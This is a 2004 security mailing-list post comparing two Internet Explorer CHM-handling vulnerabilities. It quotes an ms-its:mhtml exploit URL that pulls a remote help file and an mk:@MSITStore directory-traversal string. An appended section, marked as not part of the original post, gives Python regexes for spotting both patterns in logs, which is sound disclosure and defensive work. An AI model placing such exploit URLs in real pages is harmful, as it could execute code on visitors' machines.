Re: [Full-Disclosure] IE exploit going around on irc
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: Re: [Full-Disclosure] IE exploit going around on irc
- From: "Lise Moorveld" <lise_moorveld@xxxxxxxxxxx>
- Date: Wed, 07 Apr 2004 15:39:07 +0200
Hello,
What I find interesting is that SecurityFocus links the "IE ms-its: and
mk:@MSITStore: vulnerability" paper by Roozbeh Afrasiabi (
http://www.securityfocus.com/archive/1/358913 ) to the "Microsoft Internet
Explorer Unspecified CHM File Processing Arbitrary Code Execution
Vulnerability (bid 9658)" posting by K-otic (
http://www.securityfocus.com/archive/1/354447 ).
They do this in BID 9658 ( http://www.securityfocus.com/bid/9658 ).
I think SecurityFocus got this wrong...
The issue referred to by K-otic is the exploit where you use a non-existent
mht file and an exclamation mark like so:
ms-its:mhtml:file://c:\yada.mhtml!http://www.example.com/compiledhelpfile.chm:/htmlfile.html
also described in Cert advisory VU#323070 (
http://www.kb.cert.org/vuls/id/323070 )
and CVE ID: CAN-2004-0380
... Roozbeh Afrasiabi doesn't use this construction anywhere in his paper...
what he DOES use, however (amongst others), is the directory-traversal
style thingy:
mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\program
files\\winamp\\skins\\x.wsz::\winamp.htm
Now, I don't claim to fully grasp the Roozbeh paper either, but he does make
a reference to Arman Nayyeri, and what I think is the following post: "IE
5.x-6.0 allows executing arbitrary programs using showHelp()" (
http://archives.neohapsis.com/archives/bugtraq/2003-12/0337.html )
Oh, and Nayyeri claims Jelmer helped him with this, so Jelmer might be able
to shed some light :)
To return to this thread, the original posting by Niek Baakman mentions the
exclamation mark issue
http://archives.neohapsis.com/archives/fulldisclosure/2004-03/1726.html
And in a reply, Thor refers to the directory traversal-style issue (or at
least the Roozbeh paper):
http://archives.neohapsis.com/archives/fulldisclosure/2004-03/1785.html
Anyway, do you guys think I'm right in thinking these are separate issues?
Bye,
Lise
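One way to tell the two constructions apart when reviewing proxy or IDS logs, as an added example that is not part of the original post (the regexes, function names and sample URLs are my own assumptions, modelled on the two strings quoted above):

```python
import re

# Constructed sample URL-column entries (not taken from any real log).
SAMPLE_URLS = [
    "ms-its:mhtml:file://c:\\yada.mhtml!http://www.example.com/compiledhelpfile.chm:/htmlfile.html",
    "mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\program files\\winamp\\skins\\x.wsz::\\winamp.htm",
    "mk:@MSITStore:C:\\WINDOWS\\Help\\iexplore.chm::/iexplore.htm",
    "http://www.example.com/index.html",
]

# Pattern 1: the "non-existent .mht file plus exclamation mark" construction
# (CAN-2004-0380 / VU#323070): ms-its: wrapping an mhtml:file:// locator whose
# file part is followed by '!' and a remote http(s) CHM.
MHTML_BANG = re.compile(r"^ms-its:mhtml:file://[^!]*!\s*https?://", re.IGNORECASE)

# Pattern 2: the mk:@MSITStore directory-traversal style from the Roozbeh paper:
# a '::' separator followed by one or more '..\' or '../' components.
MSITSTORE_TRAVERSAL = re.compile(r"^mk:@MSITStore:.*::\s*(\.\.[\\/])+", re.IGNORECASE)

CHM_SCHEME = re.compile(r"^(ms-its:|mk:@MSITStore:)", re.IGNORECASE)


def classify_chm_url(url):
    """Return which construction a URL matches, or None.

    'mhtml-bang'          -> ms-its:mhtml:...!http://...   (CAN-2004-0380)
    'msitstore-traversal' -> mk:@MSITStore:...::..\\..\\... (traversal style)
    'chm-protocol'        -> ms-its:/mk:@MSITStore: URL using neither trick
    None                  -> not a CHM protocol URL at all
    """
    u = url.strip()
    if MHTML_BANG.search(u):
        return "mhtml-bang"
    if MSITSTORE_TRAVERSAL.search(u):
        return "msitstore-traversal"
    if CHM_SCHEME.search(u):
        return "chm-protocol"
    return None


def summarize(urls):
    """Count URLs per class, e.g. over a proxy log's URL column."""
    counts = {}
    for u in urls:
        label = classify_chm_url(u) or "other"
        counts[label] = counts.get(label, 0) + 1
    return counts
```

Running `summarize(SAMPLE_URLS)` puts each of the four constructed entries in a different bucket, which is the point: the two exploit strings quoted in the post trip different rules.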